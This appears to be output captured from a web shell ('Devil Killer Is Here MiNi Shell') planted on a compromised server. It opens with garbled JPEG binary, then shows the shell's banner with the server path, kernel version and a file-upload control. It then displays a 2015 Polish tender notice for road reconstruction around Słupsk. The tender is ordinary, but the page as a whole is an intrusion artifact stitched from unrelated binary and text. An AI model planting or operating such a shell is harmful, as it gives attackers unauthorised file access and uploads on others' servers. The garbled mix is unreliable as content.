JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150428/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150428/60269-N-2015.html

<p class="kh_header"><b>Słupsk: Przebudowa dróg powiatowych zarządzanych przez ZDP Słupsk   z podziałem na 4 zadania

ZADANIE nr 1   Przebudowa drogi powiatowej nr 1135G w m. Zgojewo (Gmina Główczyce)
ZADANIE nr 2 - Przebudowa drogi powiatowej nr 1015G Słupsk - Możdżanowo (Gmina Słupsk) 
ZADANIE nr 3   Przebudowa drogi powiatowej nr 1143G Główczyce   Stowięcino w m. Warblino i w m. Szczypkowice (Gmina Główczyce)
ZADANIE nr 4   Przebudowa drogi powiatowej nr 1139G Mianowice   Główczyce na odcinku Karżniczka   Damnica (gm. Damnica)</b><br>
<b>Numer ogłoszenia: 60269 - 2015; data zamieszczenia: 28.04.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych , ul. Słoneczna 16e, 76-200 Słupsk, woj. pomorskie, tel. 059 8420730, 0598420269, faks 0598420284.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg powiatowych zarządzanych przez ZDP Słupsk   z podziałem na 4 zadania

ZADANIE nr 1   Przebudowa drogi powiatowej nr 1135G w m. Zgojewo (Gmina Główczyce)
ZADANIE nr 2 - Przebudowa drogi powiatowej nr 1015G Słupsk - Możdżanowo (Gmina Słupsk) 
ZADANIE nr 3   Przebudowa drogi powiatowej nr 1143G Główczyce   Stowięcino w m. Warblino i w m. Szczypkowice (Gmina Główczyce)
ZADANIE nr 4   Przebudowa drogi powiatowej nr 1139G Mianowice   Główczyce na odcinku Karżniczka   Damnica (gm. Damnica).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE nr 1   Przebudowa drogi powiatowej 1135G w m. Zgojewo (Gmina Główczyce)
Opis robót
Przedmiotem zamówienia jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1135G (Żelkowo   Zgojewo   Święcichowo   Damnica) od km 1+840 do km 2+840 w m. Zgojewo na łącznej długości 1,0km. Zakres prac obejmuje wykonanie na istniejącej jezdni asfaltowej odcinka podbudowy z kruszywa łamanego celem jej wyrównania, a następnie wykonanie nakładki bitumicznej z dwóch warstw betonu asfaltowego dla ruchu KR 1-2  warstwa wyrównawcza o grubości 3cm i warstwa ścieralna o grubości 3cm oraz obustronnych poboczy z kruszywa łamanego o szerokości 0,75m.
ZADANIE nr 2   Przebudowa drogi powiatowej nr 1015G Słupsk   Możdżanowo (Gmina Słupsk) 
Opis robót
Przedmiotem zamówienia jest wykonanie robót budowlanych przebudowy drogi powiatowej nr 1015G (od dr. wojewódzkiej 203   Możdżanowo   Bruskowo Wielkie   Słupsk) na odcinku w m. Krzemienica oraz od m. Bruskowo Małe do m. Bruskowo Wielkie. Zakres prac obejmuje:
wykonanie w m. Krzemienica na istniejącej jezdni asfaltowej nakładki bitumicznej z dwóch warstw betonu asfaltowego dla ruchu KR 1 2  warstwa wyrównawcza o grubości 3cm i warstwa ścieralna o grubości 3cm oraz obustronnych poboczy z kruszywa łamanego o szerokości 0,75m,
wykonanie na odcinku  od m. Bruskowo Małe do m. Bruskowo Wielkie na istniejącej jezdni asfaltowej nakładki bitumicznej z dwóch warstw betonu asfaltowego dla ruchu KR 1 2  warstwa wyrównawcza 
o grubości 3cm i warstwa ścieralna o grubości 3cm oraz obustronnych poboczy z kruszywa łamanego o szerokości 0,75m oraz wykonanie zjazdu z drogi powiatowej na drogę gminną wraz z wykonaniem przepustu, w km 10+050, a także budowę zatoki autobusowej wraz z odcinkiem kolektora deszczowego w km 10+600.
ZADANIE nr 3   Przebudowa drogi powiatowej nr 1143G Główczyce   Stowięcino w m. Warblino i
w m. Szczypkowice (Gmina Główczyce)
Opis robót
Przedmiotem zamówienia jest wykonanie przebudowy drogi powiatowej nr 1143G Główczyce   Stowięcino na odcinku od km 4+100 do km 4+460 w m. Warblino oraz na odcinku od km 5+900 do km 6+180 w m. Szczypkowice na łącznej długości 0,64km. W ramach przebudowy należy wykonać 

1. W m. Warblino
chodniki z kostki betonowej szer. 1,5 2,0m o gr. 6cm na podsypce cementowo  piaskowej z warstwą odsączającą z pospółki o średniej grubości 40cm w obramowaniu obrzeży betonowych  i krawężników drogowych betonowych na ławie betonowej,
nakładkę bitumiczną na jezdni z betonu asfaltowego KR 1 2 warstwa wyrównawcza gr. 3cm i warstwa ścieralna gr. 3cm,
pobocza z kruszywa łamanego gr. 8cm o szerokości 0,75m,
oczyszczenie istniejącego przepustu pod drogą nr 1143G.

2. W m. Szczypkowice
chodniki z kostki betonowej szer. 1,5m o gr. 6cm na podsypce cementowo  piaskowej z warstwą odsączającą z pospółki o gr. 10cm w obramowaniu obrzeży betonowych   krawężników drogowych betonowych na ławie betonowej,
zjazdy na posesje w obrębie chodnika z kostki betonowej o gr. 8cm na podsypce cementowo   piaskowej z podbudową z kruszywa łamanego gr. 20cm oraz warstwą odsączającą z pospółki o gr. 10cm w obramowaniu z krawężników drogowych betonowych na ławie betonowej.

ZADANIE nr 4   Przebudowa drogi powiatowej nr 1139G Mianowice  Główczyce na odcinku
Karżniczka   Damnica (Gmina Damnica)
Opis robót

Przedmiotem zamówienia jest wykonanie przebudowy drogi powiatowej nr 1139G Mianowice   Główczyce na odcinku od km 15+900 do km 18+100  na długości 2,2km i powierzchni jezdni  9800m2. W ramach przebudowy należy wykonać nakładkę bitumiczną na jezdni z betonu asfaltowego KR 1 2 warstwa wyrównawcza gr. 3cm i warstwa ścieralna gr. 3cm, miejscową rozbiórkę nawierzchni i podbudowy wraz z odtworzeniem warstw konstrukcyjnych, pobocza z kruszywa łamanego gr. 7cm o szerokości 0,75m, pobocza z destruktu asfaltowego uzyskanego z frezowania nawierzchni gr. 7cm o szerokości 0,75m..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY MOŻE UDZIELIĆ ZAMÓWIEŃ UZUPEŁNIAJĄCYCH do 50% wartości
 zamówienia podstawowego w trybie zamówień z wolnej ręki na zasadach określonych w art. 67
 ust. 1 pkt 6 ustawy PZP</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.32.20-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wadium w wysokości  5.000,00 PLN (słownie  pięć tysięcy PLN)  na zadanie nr 1, 15.000,00 PLN (słownie  piętnaście tysięcy PLN)  na zadanie nr 2, 5.000,00 PLN (słownie  pięć tysięcy PLN) na zadanie nr 3, 20.000,00 PLN (słownie dwadzieścia tysięcy PLN)  na zadanie nr 4 
Wadium wnosi się przed upływem terminu składania ofert.
Wadium musi obejmować cały okres związania ofertą.
Wadium może być wnoszone w jednej lub kilku następujących formach: 
pieniądzu, przelewem na rachunek Zamawiającego w Bank Spółdzielczy Ustka 18 9315 0004 0050 6791 2000 0040
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
gwarancjach bankowych
gwarancjach ubezpieczeniowych
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9    listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
Wadium wniesione w formie pieniądza powinno być oznaczone w następujący sposób  Wadium ZDP.GI Z.272.6.2015  dot. zadania nr       Kopię dowodu wniesienia wadium potwierdzoną za zgodność z oryginałem przez Wykonawcę zaleca się dołączyć do oferty.
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
Jako termin wniesienia wadium w formie pieniądza zostanie przyjęty termin uznania na rachunku      Zamawiającego.
Jeżeli Wykonawca wnosi wadium w innej formie niż pieniądz, oryginał dokumentu wadium należy dołączyć do oferty. 
Wadium wniesione w formie poręczenia lub gwarancji bankowej, gwarancji ubezpieczeniowej musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 46 ust. 4a i  5 Ustawy.
Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty                   najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a Ustawy.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu                    zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed 
upływem terminu składania ofert.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako           najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
Jeżeli wadium wniesiono w pieniądzu Zamawiający zwróci je wraz z odsetkami wynikającymi z 
umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty 
prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez  Wykonawcę.
Zgodnie z art. 46 ust. 4a Ustawy Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli          Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
Zgodnie z art. 46 ust. 5 Ustawy Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli             Wykonawca, którego oferta została wybrana
odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w    ofercie
nie wniósł wymaganego zabezpieczenia należytego wykonania umowy
zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie należy złożyć Oświadczenie o spełnianiu warunków przez Wykonawcę, art.22 ust 1 Pzp Zamawiający będzie się kierował regułą spełnia albo nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna udokumentowanie posiadania wiedzy i doświadczenia
 tzn. posiada niezbędną wiedzę i doświadczenie w zakresie wykonania robót budowlanych odpowiadających robotom budowlanym stanowiącym przedmiot zamówienia  tj. wykonał w okresie pięciu ostatnich lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy   w tym okresie, 
dotyczy zadania nr 1
co najmniej dwie roboty budowlane 
dot. budowy dróg (ulic) bądź przebudowy dróg (ulic), każda o wartości brutto nie mniejszej niż 125.000,00 zł 
lub jedna dot. roboty budowlanej
dot. budowy dróg (ulic)  bądź przebudowy dróg (ulic) na kwotę nie mniejszą niż 250.000,00 zł 

dotyczy zadania nr 2
co najmniej dwie roboty budowlane 
dot. budowy dróg (ulic) bądź przebudowy dróg (ulic), każda o wartości brutto nie mniejszej niż 375.000,00 zł 
lub jedna dot. roboty budowlanej
dot. budowy dróg (ulic)  bądź przebudowy dróg (ulic) na kwotę nie mniejszą niż 750.000,00 zł 

dotyczy zadania nr 3
co najmniej dwie roboty budowlane 
dot. budowy dróg (ulic) bądź przebudowy dróg (ulic), każda o wartości brutto nie mniejszej niż 125.000,00 zł 
lub jedna dot. roboty budowlanej
dot. budowy dróg (ulic)  bądź przebudowy dróg (ulic) na kwotę nie mniejszą niż 250.000,00 zł 

dotyczy zadania nr 4
co najmniej dwie roboty budowlane 
dot. budowy dróg (ulic) bądź przebudowy dróg (ulic), każda o wartości brutto nie mniejszej niż 500.000,00 zł 
lub jedna dot. roboty budowlanej
dot. budowy dróg (ulic)  bądź przebudowy dróg (ulic) na kwotę nie mniejszą niż 1.000.000,00 zł</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponuje osobami zdolnymi do wykonywania zamówienia, które posiadają uprawnienia do wykonywania określonej działalności lub czynności tj.  za spełnienie warunku Zamawiający uzna udokumentowanie dysponowaniem osobami zdolnymi do wykonania zamówienia, posiadającymi doświadczenie i uprawnienia, odpowiednie do zakresu wykonywanych przez nie czynności, co najmniej: 
co najmniej jedną osobą posiadającą uprawnienia budowlane do prowadzenia robót objętych przedmiotem zamówienia w zakresie branży drogowej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, a także posiadają min. 3 letnie doświadczenie zawodowe liczone od momentu uzyskaniu uprawnień budowlanych.
Wykonawcy z innych Państw członkowskich winni zapewnić przy realizacji zamówienia udział osób, posiadających kwalifikacje do pełnienia wyżej wymienionych samodzielnych funkcji w budownictwie , zgodnie z art. 12a ustawy z dnia 7 lipca 1994r.  Prawo budowlane.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony jeżeli Wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż  200.000,00 PLN (słownie  dwieście tysięcy PLN) na zadanie nr 1, na zadanie nr 2
  na kwotę nie mniejszą niż: 700.000,00 PLN (słownie: siedemset tysięcy PLN), na zadanie nr 3
  na kwotę nie mniejszą niż  200.000,00 PLN (słownie  dwieście tysięcy PLN),  na zadanie nr 4
  na kwotę nie mniejszą niż  900.000,00 PLN (słownie  dziewięćset tysięcy PLN)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 94.00</li>
<li>2 - Dodatkowa gwarancja - 6.00</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia zmian do treści zawartej umowy Załączniku nr 8 do SIWZ w następujących przypadkach 
zmiany przepisów prawnych, w tym zmiany stawki od podatku od towarów i usług mającej
zastosowanie do przedmiotu umowy, 
wydania decyzji, postanowień lub innych aktów organów administracji publicznej bądź instytucji
kontrolujących działania Zamawiającego mających wpływ na wykonanie przedmiotu umowy, o ile
okoliczności powodują konieczność zmiany wysokości, wartości lub sposobu spełnienia
świadczeń stron. 
termin zakończenia przedmiotu umowy może ulec zmianie wyłącznie z przyczyn niezawinionych i niezależnych od Wykonawcy takich jak
występują warunki pogodowe uniemożliwiające prowadzenie robót   silne opady deszczu lub śniegu  a także utrzymująca się temperatura poniżej 5 stopni C udokumentowana pomiarami wykonanymi na budowie i potwierdzonymi wpisem do dziennika budowy przez Wykonawcę oraz Inspektora Nadzoru, zgłoszone pisemnie przez Wykonawcę wraz z potwierdzeniem zasadności przez Inspektora Nadzoru.
nastąpiła konieczność przeprowadzenia badań archeologicznych, które wstrzymują możliwość
robót budowlanych,
stwierdzono obecność niewybuchów, które stwarzają niebezpieczeństwo dla życia,
wstrzymano roboty za względu na roszczenia osób trzecich do własności gruntu lub innych
nieruchomości, 
nastąpiło wstrzymanie prac przez pracowników organów państwowych zgodnie z obowiązującym
prawem ,
Ponadto Zamawiający zgodnie z art. 144 ustawy PZP przewiduje możliwość wprowadzenia zmian do
 treści zawartej umowy w następującym zakresie zmiany osób wskazanych przez Wykonawcę do
 pełnienia funkcji 
osoba posiadająca uprawnienia budowlane do prowadzenia robót objętych przedmiotem zamówienia
w zakresie branży drogowej
Zamawiający dopuszcza możliwość zmiany inspektora nadzoru.
sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych w szczególności następującymi okolicznościami 
niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót spowodowania zaprzestania produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzenie
kosztów realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, 
pojawienie się nowszej technologii wykonania zaprojektowanych robót pozwalających na 
zaoszczędzeniu czasu realizacji inwestycji lub kosztów wykonanych prac, jak również kosztów 
eksploatacji wykonanego przedmiotu umowy, 
konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań
technicznych technologicznych niż wskazane w dokumentacji projektowej lub specyfikacji
technicznej wykonania i odbioru robót, w sytuacji, gdyby zastosowanie przewidzianych rozwiązań
groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy, 
Inne przesłanki do wprowadzenia zmian do  treści zawartej umowy 
W przypadku konieczności wykonania robót nieprzewidzianych lub zamiennych, a niezbędnych do wykonania przedmiotu umowy zgodnie ze sztuką budowlaną i zasadami wiedzy technicznej.
